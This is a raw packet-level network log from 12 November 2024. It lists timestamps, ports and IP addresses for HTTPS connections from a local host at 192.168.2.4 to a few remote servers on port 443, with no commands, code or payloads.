                                  Nov 12, 2024 16:42:09.261147022 CET49806443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:09.261164904 CET4434980613.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:09.261331081 CET49806443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:09.261331081 CET49806443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:09.261352062 CET4434980613.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:09.846437931 CET4434980313.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:09.848309040 CET49803443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:09.848309040 CET49803443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:09.848321915 CET4434980313.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:09.848336935 CET4434980313.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:09.867170095 CET4434980413.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:09.867937088 CET49804443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:09.867949009 CET4434980413.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:09.869174957 CET49804443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:09.869179010 CET4434980413.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:09.869476080 CET44349802172.217.18.100192.168.2.4
                                  Nov 12, 2024 16:42:09.871223927 CET49802443192.168.2.4172.217.18.100
                                  Nov 12, 2024 16:42:09.871242046 CET44349802172.217.18.100192.168.2.4
                                  Nov 12, 2024 16:42:09.871534109 CET44349802172.217.18.100192.168.2.4
                                  Nov 12, 2024 16:42:09.874044895 CET4434980513.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:09.874099016 CET49802443192.168.2.4172.217.18.100
                                  Nov 12, 2024 16:42:09.874161959 CET44349802172.217.18.100192.168.2.4
                                  Nov 12, 2024 16:42:09.875507116 CET49805443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:09.875507116 CET49805443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:09.875516891 CET4434980513.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:09.875530958 CET4434980513.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:09.916328907 CET49802443192.168.2.4172.217.18.100
                                  Nov 12, 2024 16:42:09.979098082 CET4434980313.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:09.979643106 CET4434980313.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:09.981981993 CET4434980613.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:09.983396053 CET49803443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:09.984349012 CET49803443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:09.984349012 CET49803443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:09.984368086 CET4434980313.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:09.984378099 CET4434980313.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:09.986064911 CET49806443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:09.986076117 CET4434980613.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:09.988215923 CET49806443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:09.988220930 CET4434980613.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:09.988535881 CET49807443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:09.988568068 CET4434980713.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:09.991401911 CET49807443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:09.991641998 CET49807443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:09.991655111 CET4434980713.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:10.003958941 CET4434980513.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:10.004350901 CET4434980513.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:10.006290913 CET49805443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:10.006290913 CET49805443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:10.006311893 CET49805443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:10.006318092 CET4434980513.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:10.007025003 CET4434980413.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:10.007322073 CET4434980413.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:10.007498980 CET49804443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:10.007534981 CET49804443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:10.007534981 CET49804443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:10.007543087 CET4434980413.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:10.007550001 CET4434980413.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:10.010648966 CET49808443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:10.010684967 CET4434980813.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:10.010967016 CET49808443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:10.012213945 CET49808443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:10.012228966 CET4434980813.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:10.013613939 CET49809443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:10.013634920 CET4434980913.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:10.015340090 CET49809443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:10.015465975 CET49809443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:10.015476942 CET4434980913.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:10.111953020 CET4434980613.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:10.111990929 CET4434980613.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:10.114289999 CET49806443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:10.114289999 CET49806443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:10.114515066 CET49806443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:10.114522934 CET4434980613.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:10.116458893 CET49810443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:10.116483927 CET4434981013.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:10.116549015 CET49810443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:10.120235920 CET49810443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:10.120250940 CET4434981013.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:10.746757984 CET4434980813.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:10.747240067 CET49808443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:10.747267008 CET4434980813.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:10.747698069 CET49808443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:10.747708082 CET4434980813.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:10.781296968 CET4434980913.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:10.781641960 CET49809443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:10.781651974 CET4434980913.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:10.781743050 CET4434980713.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:10.782068014 CET49807443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:10.782079935 CET4434980713.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:10.782218933 CET49809443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:10.782223940 CET4434980913.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:10.782495975 CET49807443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:10.782500982 CET4434980713.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:10.860521078 CET4434981013.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:10.860846996 CET49810443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:10.860857964 CET4434981013.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:10.861248016 CET49810443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:10.861253023 CET4434981013.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:10.916497946 CET4434980913.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:10.916941881 CET4434980913.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:10.916982889 CET49809443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:10.917011023 CET4434980713.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:10.917053938 CET4434980713.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:10.917092085 CET49807443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:10.918458939 CET49809443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:10.918467045 CET4434980913.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:10.918492079 CET49809443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:10.918495893 CET4434980913.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:10.925642014 CET4434980813.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:10.925684929 CET4434980813.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:10.925719023 CET49808443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:10.927119017 CET49807443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:10.927134037 CET4434980713.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:10.927143097 CET49807443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:10.927148104 CET4434980713.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:10.933041096 CET49808443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:10.933057070 CET4434980813.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:10.938241959 CET49811443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:10.938256979 CET4434981113.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:10.938308954 CET49811443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:10.941642046 CET49812443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:10.941658020 CET4434981213.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:10.941706896 CET49812443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:10.945616007 CET49813443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:10.945633888 CET4434981313.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:10.945683956 CET49813443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:10.945996046 CET49811443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:10.946006060 CET4434981113.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:10.946913004 CET49812443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:10.946924925 CET4434981213.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:10.947710991 CET49813443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:10.947727919 CET4434981313.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:10.994323015 CET4434981013.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:10.994370937 CET4434981013.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:10.994410992 CET49810443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:10.994700909 CET49810443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:10.994714022 CET4434981013.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:11.000310898 CET49814443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:11.000325918 CET4434981413.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:11.000376940 CET49814443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:11.000616074 CET49814443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:11.000628948 CET4434981413.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:11.681534052 CET4434981313.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:11.682504892 CET49813443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:11.682527065 CET4434981313.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:11.683209896 CET49813443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:11.683214903 CET4434981313.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:11.686106920 CET4434981213.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:11.688683033 CET49812443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:11.688705921 CET4434981213.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:11.689068079 CET49812443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:11.689073086 CET4434981213.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:11.729784012 CET4434981413.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:11.731021881 CET49814443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:11.731021881 CET49814443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:11.731039047 CET4434981413.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:11.731054068 CET4434981413.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:11.743963957 CET4434981113.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:11.744687080 CET49811443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:11.744695902 CET4434981113.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:11.748203993 CET49811443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:11.748208046 CET4434981113.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:11.811125994 CET4434981313.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:11.811939001 CET4434981313.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:11.812544107 CET49813443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:11.812598944 CET49813443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:11.812598944 CET49813443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:11.812608957 CET4434981313.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:11.812617064 CET4434981313.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:11.817904949 CET4434981213.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:11.817936897 CET49815443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:11.817954063 CET4434981513.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:11.818092108 CET49815443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:11.818506002 CET4434981213.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:11.818537951 CET49815443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:11.818550110 CET4434981513.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:11.818583012 CET49812443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:11.818733931 CET49812443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:11.818747997 CET4434981213.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:11.818809032 CET49812443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:11.818815947 CET4434981213.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:11.823223114 CET49816443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:11.823270082 CET4434981613.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:11.826354980 CET49816443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:11.826539993 CET49816443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:11.826555967 CET4434981613.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:11.861938953 CET4434981413.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:11.862082958 CET4434981413.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:11.862253904 CET49814443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:11.862453938 CET49814443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:11.862461090 CET4434981413.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:11.862494946 CET49814443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:11.862499952 CET4434981413.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:11.868208885 CET49817443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:11.868232965 CET4434981713.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:11.871444941 CET49817443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:11.871444941 CET49817443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:11.871470928 CET4434981713.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:11.944793940 CET4434981113.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:11.945097923 CET4434981113.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:11.945183992 CET49811443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:11.945183992 CET49811443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:11.945203066 CET49811443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:11.945209026 CET4434981113.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:11.946990967 CET49818443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:11.947015047 CET4434981813.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:11.947465897 CET49818443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:11.947465897 CET49818443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:11.947490931 CET4434981813.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:12.562369108 CET4434981613.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:12.568629026 CET49816443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:12.568648100 CET4434981613.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:12.570249081 CET49816443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:12.570255041 CET4434981613.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:12.587980032 CET4434981513.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:12.588581085 CET49815443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:12.588593006 CET4434981513.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:12.589709044 CET49815443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:12.589714050 CET4434981513.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:12.599556923 CET4434981713.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:12.600400925 CET49817443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:12.600413084 CET4434981713.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:12.602400064 CET49817443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:12.602406025 CET4434981713.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:12.684499979 CET4434981813.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:12.685106993 CET49818443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:12.685117960 CET4434981813.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:12.686131001 CET49818443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:12.686136007 CET4434981813.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:12.695095062 CET4434981613.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:12.695144892 CET4434981613.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:12.695188046 CET49816443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:12.695791006 CET49816443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:12.695805073 CET4434981613.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:12.695811033 CET49816443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:12.695816994 CET4434981613.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:12.704412937 CET49819443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:12.704431057 CET4434981913.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:12.704485893 CET49819443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:12.704627991 CET49819443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:12.704634905 CET4434981913.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:12.726216078 CET4434981513.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:12.726473093 CET4434981513.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:12.726521015 CET49815443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:12.733920097 CET49815443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:12.733932018 CET4434981513.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:12.733941078 CET49815443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:12.733946085 CET4434981513.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:12.736479998 CET4434981713.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:12.736550093 CET4434981713.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:12.736594915 CET49817443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:12.737071991 CET49817443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:12.737077951 CET4434981713.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:12.737087965 CET49817443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:12.737092018 CET4434981713.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:12.744105101 CET49820443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:12.744123936 CET4434982013.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:12.744175911 CET49820443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:12.746171951 CET49821443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:12.746190071 CET4434982113.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:12.746243954 CET49821443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:12.746535063 CET49820443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:12.746541977 CET4434982013.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:12.747181892 CET49821443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:12.747193098 CET4434982113.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:12.818797112 CET4434981813.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:12.818957090 CET4434981813.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:12.819009066 CET49818443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:12.819166899 CET49818443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:12.819178104 CET4434981813.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:12.819205999 CET49818443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:12.819211960 CET4434981813.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:12.824783087 CET49822443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:12.824807882 CET4434982213.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:12.824871063 CET49822443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:12.825198889 CET49822443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:12.825211048 CET4434982213.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:13.503752947 CET4434982013.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:13.504290104 CET49820443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:13.504302979 CET4434982013.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:13.504563093 CET4434982113.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:13.504678965 CET49820443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:13.504683971 CET4434982013.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:13.505021095 CET49821443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:13.505038977 CET4434982113.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:13.505383015 CET49821443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:13.505387068 CET4434982113.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:13.570688963 CET4434982213.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:13.571218967 CET49822443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:13.571234941 CET4434982213.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:13.571321964 CET49822443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:13.571326017 CET4434982213.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:13.639559984 CET4434982113.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:13.640278101 CET4434982113.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:13.640383959 CET49821443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:13.640383959 CET49821443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:13.640441895 CET49821443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:13.640450954 CET4434982113.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:13.642944098 CET49823443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:13.642960072 CET4434982313.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:13.643167019 CET49823443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:13.643167019 CET49823443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:13.643186092 CET4434982313.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:13.702848911 CET4434982213.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:13.702887058 CET4434982213.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:13.702940941 CET49822443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:13.703119993 CET49822443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:13.703129053 CET4434982213.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:13.703156948 CET49822443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:13.703161001 CET4434982213.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:13.705029964 CET49824443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:13.705063105 CET4434982413.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:13.705230951 CET49824443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:13.705230951 CET49824443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:13.705255032 CET4434982413.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:13.988127947 CET4434981913.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:13.988939047 CET49819443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:13.988939047 CET49819443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:13.988960028 CET4434981913.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:13.988975048 CET4434981913.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:14.136354923 CET4434982013.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:14.136921883 CET4434982013.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:14.137039900 CET49820443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:14.137039900 CET49820443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:14.137229919 CET49820443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:14.137238026 CET4434982013.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:14.139369011 CET49825443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:14.139395952 CET4434982513.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:14.139554024 CET49825443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:14.139653921 CET49825443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:14.139666080 CET4434982513.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:14.437293053 CET4434982413.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:14.438178062 CET49824443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:14.438178062 CET49824443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:14.438194990 CET4434982413.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:14.438211918 CET4434982413.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:14.575449944 CET4434982413.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:14.575509071 CET4434982413.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:14.575567961 CET49824443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:14.575784922 CET49824443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:14.575784922 CET49824443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:14.575804949 CET4434982413.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:14.575814962 CET4434982413.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:14.578263044 CET49826443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:14.578289986 CET4434982613.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:14.578404903 CET49826443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:14.578586102 CET49826443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:14.578602076 CET4434982613.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:14.605068922 CET4434981913.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:14.605493069 CET4434981913.107.246.45192.168.2.4
                                  Nov 12, 2024 16:42:14.605541945 CET49819443192.168.2.413.107.246.45
                                  Nov 12, 2024 16:42:14.605581999 CET49819443192.168.2.413.107.246.45
